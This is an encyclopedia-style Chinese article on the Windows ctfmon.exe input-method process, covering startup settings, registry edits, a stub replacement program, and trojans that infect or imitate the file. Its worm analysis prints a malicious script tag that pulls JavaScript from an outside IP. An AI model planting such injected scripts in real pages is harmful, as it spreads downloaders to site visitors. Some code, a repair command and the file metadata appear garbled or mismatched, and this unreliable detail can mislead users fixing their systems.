ctfmon.exe

ctfmon.exe是Microsoft Office产品套装的一部分，是有关输入法的一个可执行程序。它可以选择用户文字输入程序，和微软Office XP语言条。这不是纯粹的系统程序，但是如果终止它，可能会导致不可知的问题。另外，ctfmon.exe可能被感染上木马而成为病毒程序。

基本信息

软件名称

ctfmon.exe

开发商

Microsoft Corp

软件平台

Microsoft Office Suite

软件语言

简体中文

软件大小

19KB

软件授权

免费软件

常见错误

未知N/A

文件类型

.exe

运行环境

Win2003,WinXP,win7

目录

1功能作用

2设置方法

3关闭方法

4安全相关

5病毒行为

6文件介绍

折叠编辑本段功能作用

Ctfmon.exe 监视活动窗口，并为语音识别、书写识别、键盘、翻译和其他中文可选用户输入方法技术提供文本输入服务支持。

缺少ctfmon进程可能造成的影响

网络上有大量主张中止ctfmon进程的讨论，但是在windows vista，windows 2008,windows 7中，缺少ctfmon进程会引起输入法的不正常行为，常见的情况是用户忽然无法在输入法开启的情况下，以按空格的方式输入可选字的第一个字的情况，刚按下空格时，输入法即被切换为英文。

在这种情况下，仍然可以用数字键来选择要输入的文字。

解决办法是重新运 ctfmon 进程。方法是:

⒈点击"开始"菜单，选择"运行"。

⒉输入:ctfmon.exe

⒊点击"运行"按钮。

折叠编辑本段设置方法

程序ctfmon.exe，XP下系统默认情况下是随电脑开机而自动启动的(Win7虽然也有此文件，但并不会随系统自动启动) 。如果你设置了ctfmon.exe不随机自动启动，进入系统后你的电脑任务栏中的输入法图标(即语言栏)就不见了。

要设置ctfmon.exe随机自动启动，可以单击"开始"→;"运行"→;输入"msconfig"(引号不要输入)，回车→;打开"系统配置使用程序"窗口→;选择"启动"页，找到ctfmon项并在其前面打上钩，按"应用"、"确定"，重启机器即可生效。

家里系统是Windows7的，不能像XP的选项操作，如果ctfmon.exe并没有删除，可工具栏选项上没有语言栏的选项的话，打开操作面板\区域和语言\键盘和语言\更改键盘\语言栏，将"停靠于任务栏"和"在任务栏中显示其他语言栏图标"勾上即可。

如果在"启动"页，找不到ctfmon项，说明注册表中已将该项删除，可以单击"开始"-->;"运行"-->;输入"regedit"(引号不要输入)，回车-->;打开"注册表编辑器"，定位到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run，在窗口的右侧新建名字为ctfmon.exe的字符串值(REG_SZ)，并将其值设置为"C:\WINDOWS\system32\ctfmon.exe"，然后关闭注册表编辑器，再执行前一步的操作即可。

当语言栏消失，且无法通过工具栏恢复时，我们也可以从系统盘中的\WINDOWS\system32\ctfmon.exe找到ctfmon.exe文件并复制，然后点击"开始"菜单，找到启动选项，右击启动--打开，然后把复制的ctfmon.exe文件粘贴到打开的启动文件夹中。

如果不运行高级文字服务，Ctfmon.exe 几乎不使用系统资源。高级文字服务是 Ctfmon.exe 通过 TIP 控制的输入技术(语音识别、书写识别和输入方法编辑器)。

Ctfmon.exe 是负责控制中文可选用户输入方法技术的文件。它启动语言栏组件(在任务栏中)，并一直在后台运行，甚至在退出 Office XP 程序之后也是如此。每次启动 Windows 时，它也会启动，并一直在后台运行，而与 Office XP 程序是否启动无关。不能根据需要加载和卸载中文可选用户输入方法系统。在安装 Office XP 中文可选用户输入方法组件后，Ctfmon.exe 在 Windows 会话期间继续在后台运行。

如何解决关闭 ctfmon.exe后出现输入法切换快捷键乱掉

注意:以下的处理方法不能保证完全不会危害您的计算机。请在采用之前认真考虑。

如果你的win2000系统装了officeXP或以上版本，它会在你和系统里留下一个ctfmon.exe文件，并自动启动运行，他困扰了无数的网友。

首先我们来说一下它对用户界面和操作体验的一些影响。

⒈ 无论打开什么窗口，总会弹出一个输入法工具体，并且默认是中文输入。

⒉ 它替换了原来的区域和输入法设置，并以一个文字服务的设置取而代之，而且不能设置默认的输入法。

⒊ 结束掉原来的输入法工具进程internat.exe，并令他不能在开机时起动。

⒋ 将自己放在开机时启动的程序列表中，除非修改注册表，否则无法去除。

⒌ 像病毒一样有重生能力，当你把ctfmon.exe删了以后，他又会随着Office的启动而重新生成。

⒍ 当你结束了ctfmon.exe后，经常会出现输入法切换快捷键乱掉的情况。

第一步:右击任务栏空白处，点"任务管理器"。

第二步:找到ctfmon.exe，并终止它。

第三步:在系统目录下的system32目录下找到ctfmon.exe，删除掉。

第四步:写一个最简单的api程序(代码见附录)，编译后放到ctfmon.exe所在目录，并更名为ctfmon.exe。

第五步:点击"开始"菜单，点击"运行"，输入internat.exe后点击确定。

第六步:重起计算机。

附:

⒈ 程序代码如下:(注意:以下程序需要用Visual C++编译。)

#include <windows.h>

int APIENTRY WinMain(HINSTANCE,HINSTANCE,LPTSTR,int)

{HANDLE m_hMutex = CreateMutex(NULL,TRUE,"ctfmon.exe");

if(GetLastError() != ERROR_ALREADY_EⅪSTS)

while ⑴ Sleep(INFINITE);

return 0;}

⒉ 如果执行后发现word的输入法无法正确使用，解决办法如下:

第一步:打开word

第二步:点击"工具"菜单中的"选项"子菜单。点击"编辑"选项卡。

第三步:清除"输入法控制处于活动状态"的复选。点击"确定"

第四步:点击"工具"菜单中"语言"子菜单中的"设置语言"项。

第五步:在列表中选择"英语 美国"，点击确定。

第六步:关闭Word，重启计算机。

另外的解决方法:开始-运行-输入"regedit"-找到"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts"-在下面的分支找到美国英语删除就行了

折叠编辑本段关闭方法

如果使用了非微软拼音输入法，那么就没必要随即开启ctfmon.exe程序，让它占用有 限的资源。比如习惯使用搜狗拼音输入法的用户，如果安装了Office软件，就会默认安装微软的拼音输入法，对不使用它的用户完全可以设法关闭它!具体的步骤是:开始→控制面板→添加或删除程序→更改或删除程序→点选MOffice相关程序项→更改→选中添加或删除功能→继续→安装选项→点开Office 共享功能→点击微软拼音输入法不可用→继续。由于安装Office程序的时候是默认安装微软输入法，那么它的ctfmon.exe程序就会随机启动，如要关闭它可以在注册表中删除随机启动项即可，在运行中输入:regedit 回车打开注册表定位到以下路径(删除ctfmon键值即可):HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ctfmon.exe

折叠编辑本段安全相关

折叠快速排查

如果你怀疑此进程有些不正常，那么我们用下面的一些方法快速的察觉出Ctfmon.exe相关的病毒,若发现情况建议马上更新杀毒软件最新病毒库并对电脑全盘扫描。

1、如果发现Ctfmon.exe不在System32目录下;

2、如果此进程发现占用资源太多;

3、如果Win7系统运行了Ctfmon.exe;

折叠病毒介绍

2010年，可牛安全中心截获到了一种替换系统ctfmon.exe的病毒(潜行者病毒)。随后，"ctfmon.exe病毒"开始呈爆发式传播，牢牢占据病毒排行榜的第一位。

"感染系统ctfmon.exe"文件病毒爆发，数百万网游玩家可能被盗号!

"该病毒"以感染Windows系统文件ctfmon.exe作为跳板，绕过杀毒软件及网游保护系统。一旦受感染的系统文件被网络游戏加载到内存，便会加载各种流行网游盗号木马(特征是扩展名为drv)，盗取《天龙八部》，《剑网三》，《QQ地下城勇士》，《CF》等流行网游的账号。同时，也会使游戏过程中频繁卡机。

截止今天，安全中心监测到有数百万网游玩家的电脑感染了ctfmon.exe病毒，造成ctfmon.exe等系统文件丢失，以及网游账号被盗。

盗号木马伪装ctfmon.exe等系统文件伺机盗取网游账号

2009年开始，木马感染系统文件成为新趋势。"系统文件替换病毒"的出现，意味着网游盗号产业进一步细化分工，可以为了绕过安全软件和网游保护而制作一种独立病毒。在过去，木马为了侵入网游，必须在启动项中进行加载，所以安全软件可以通过启动项检查发现是否有木马进入系统。而像"ctfmon.exe病毒"这种通过感染ctfmon.exe文件，从而将木马加载进网游进程的形势，可以绕过大多数安全软件的检测。这也是"系统文件感染病毒" 至今没有被主流杀软查杀的原因。

折叠软件修复

多数杀毒软件对"潜行者"病毒无法查杀，或查杀后造成系统找不到ctfmon.exe文件，导致运行网游时弹出系统文件丢失提示。从百度、谷歌等搜索引擎搜索量情况来看，网友对ctfmon.exe文件的搜索量持续回升， 也可以确定网友对杀毒软件只管查杀，不管修复是如此无奈。

安全中心建议，《天龙八部》、《剑网3》、《QQ地下城与勇士》、《穿越火线》等网游的玩家，立即运行《可牛免费杀毒》进行全盘扫描，检测系统是否已经被"ctfmon.exe病毒"入侵。

如果因其他杀软查杀，导致电脑出现ctfmon.exe文件丢失，可以使用ctfmon.exe可牛系统文件修复工具进行系统文件完美修复!

折叠下载修复

步骤1:将Windows XP安装 光盘插入你的光驱，然后依次点击"开始→运行"。

步骤2:在"运行"窗口中输入"expand x:\i386\rundll32.ex_c:\windows\system32 \rundll32.exe"命令并回车执行(其中"x"为光驱的盘符)。

步骤3:修复完毕后，重新启动系统即可。

折叠编辑本段病毒行为

感染虫下载器45056Win32.Troj.Downloader.c.45056

这是一个蠕虫病毒。(蠕虫病毒比以前少了很多，但对局域网的影响会很大)

该病毒运行后，会指定的网络上下载病毒程序，并且会搜索局域网内机器，以弱口令进行尝试性连接

一旦连接成功，则判断该机器弱口令是否有足够的权限，有则向该远程机器发送恶意数据，然后利用windows漏洞来下载程序，予以执行.

⒈病毒运行后，产生以下病毒文件

%WINDIR%\ SYSTEM32\tmipo.bat

%WINDIR%\ SYSTEM32\taimpo.txt

⒉添加病毒启动项

启动项名:svchost对应路径:%Documents and Settings%\Administrator\桌面\ctfmon.exe

⒊病毒会触发taimpo.bat病毒文件，用来关闭"360安全卫士",使用户的安全性能降低.

⒋病毒会检测连接的远程机器，当远程机器的登录木马是弱口令时，则会对该机器进行攻击，最后下载adi.vbs到用户机器上.

⒌遍历磁盘，查找*.htm、*.PHP、*.ASP等网页文件，开始感染，插入一段JS代码:

script language=javascript src=http://218.**.**.248/qq.js

这段脚本病毒，可能会被用作下载更多的木马程序，利用蠕虫攻击传播，利用下载器种植木马，是目前黑客偷东西惯用的手法。

解决方案:

怕麻烦直接去下载专杀工具:

⒈删除病毒生成的三个文件，可使用清理专家的文件粉碎器完成操作。

%WINDIR%\ SYSTEM32\tmipo.bat (%WINDIR%缺省是c:\windows目录)

%WINDIR%\ SYSTEM32\taimpo.txt

%Documents and Settings%\Administrator\桌面\ctfmon.exe(伪装成输入法的程序名)

⒉使用金山卫士的修复功能，将病毒添加的注册表启动项删除。

防范措施:

⒈最最重要的，是给系统打补丁，登录系统一定要使用口令，就算是电脑只有自己一个人用，也需要安全的登录口令，口令不能太简单，以免被远程攻击工具猜解。(因为只要电脑接入互联网，就能给木马以机会.)

其它方案基本是相通的，不在缀述!

中毒后的解决办法

将杀毒软件升级到最近版本进行查杀，如果查杀完毕后发现输入法无法正常使用的情况，请下载附件中的文件，将其解压后复制到"C:\Windows\system32\" 文件夹即可解决。

备注:如果 ctfmon.exe 位于在目录 C:\Windows下，那么威胁危险度是 70%。文件大小是 2,811,732 字节 (占总出现比率 37%)，20,062 字节，50,670 字节，18,353 字节，95,744 字节。应用程序是不可见的。这是个不知名的文件存放于 Windows 目录。这个不是 Windows 核心文件。没有进程的相关资料。ctfmon.exe 是有能力可以 隐藏自身，监控应用程序。

折叠编辑本段文件介绍

ctfmon.exe (5.1.2600.1106)

名字:

Windows XP Home Edition,Deutsch

执照:

商业

文件道路:

C:\WINDOWS\system32\dllcache \ ctfmon.exe

文件日期:

2002-08-29 14:00:00

版本:

5.1.2600.1106

文件大小:

13.312 字节

CRC32:

2E4072CA

MD5:

E5EE 2F47 00B6 A85F 0D45 A18C 67DA 500F

SHA1:

1D1B F316 C6D3 E91F 8975 60FC E77F 038A FB72 56FF

公司名称:

Microsoft Corporation

文件描述:

CTF Loader

文件操作系统:

Windows NT,Windows 2000,Windows XP,Windows 2003

文件类型:

Dynamic Link Library (DLL)

文件版本:

5.1.2600.1106

内部名:

CTFMON

法律版权:

?Microsoft Corporation. All rights reserved.

原始的文件名:

CTFMON.EXE

产品名称:

Microsoft Windows Operating System

产品版本:

5.1.2600.1106